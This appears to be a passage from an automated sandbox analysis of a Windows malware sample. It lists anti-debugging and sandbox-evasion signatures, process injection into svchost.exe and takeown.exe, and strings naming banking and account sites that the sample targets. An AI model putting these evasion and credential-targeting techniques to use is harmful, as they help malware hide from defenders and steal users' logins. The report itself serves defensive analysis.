                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeAPI/Special instruction interceptor: Address: 1153274
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FF9105CDA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: arGdXDmyGJ.exe, 00000000.00000002.1235183286.0000000001A73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E rdtsc 2_2_0317096E
                Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 9834Jump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105132
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\takeown.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312Thread sleep count: 137 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312Thread sleep time: -274000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312Thread sleep count: 9834 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312Thread sleep time: -19668000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe TID: 7328Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FF445A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFC6D1 FindFirstFileW,FindClose,0_2_00FFC6D1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FFC75C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FFEF95
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FFF0F2
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FFF3F3
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FF37EF
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FF3B12
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FFBCBC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F1C380 FindFirstFileW,FindNextFileW,FindClose,10_2_02F1C380
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F949A0
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 1f2Wt16K.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 1f2Wt16K.10.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 1f2Wt16K.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 1f2Wt16K.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 1f2Wt16K.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: firefox.exe, 0000000D.00000002.1739284591.0000023637FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.10.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3702819143.00000000005D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 1f2Wt16K.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 1f2Wt16K.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 1f2Wt16K.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 1f2Wt16K.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 1f2Wt16K.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 1f2Wt16K.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 1f2Wt16K.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 1f2Wt16K.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 1f2Wt16K.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 1f2Wt16K.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeAPI call chain: ExitProcess graph end nodegraph_0-104976
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeAPI call chain: ExitProcess graph end nodegraph_0-105475
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E rdtsc 2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172E3 LdrLoadDll,2_2_004172E3
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01003F09 BlockInput,0_2_01003F09
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F93B3A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FC5A7C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F94B37 LoadLibraryA,GetProcAddress,0_2_00F94B37
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01153540 mov eax, dword ptr fs:[00000030h]0_2_01153540
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_011534E0 mov eax, dword ptr fs:[00000030h]0_2_011534E0
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01151E70 mov eax, dword ptr fs:[00000030h]0_2_01151E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C310 mov ecx, dword ptr fs:[00000030h]2_2_0312C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150310 mov ecx, dword ptr fs:[00000030h]2_2_03150310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov ecx, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA352 mov eax, dword ptr fs:[00000030h]2_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D437C mov eax, dword ptr fs:[00000030h]2_2_031D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov ecx, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h]2_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h]2_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC3CD mov eax, dword ptr fs:[00000030h]2_2_031EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B63C0 mov eax, dword ptr fs:[00000030h]2_2_031B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031663FF mov eax, dword ptr fs:[00000030h]2_2_031663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312823B mov eax, dword ptr fs:[00000030h]2_2_0312823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A250 mov eax, dword ptr fs:[00000030h]2_2_0312A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136259 mov eax, dword ptr fs:[00000030h]2_2_03136259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov eax, dword ptr fs:[00000030h]2_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov ecx, dword ptr fs:[00000030h]2_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312826B mov eax, dword ptr fs:[00000030h]2_2_0312826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov ecx, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov ecx, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F0115 mov eax, dword ptr fs:[00000030h]2_2_031F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160124 mov eax, dword ptr fs:[00000030h]2_2_03160124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C156 mov eax, dword ptr fs:[00000030h]2_2_0312C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C8158 mov eax, dword ptr fs:[00000030h]2_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov ecx, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03170185 mov eax, dword ptr fs:[00000030h]2_2_03170185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
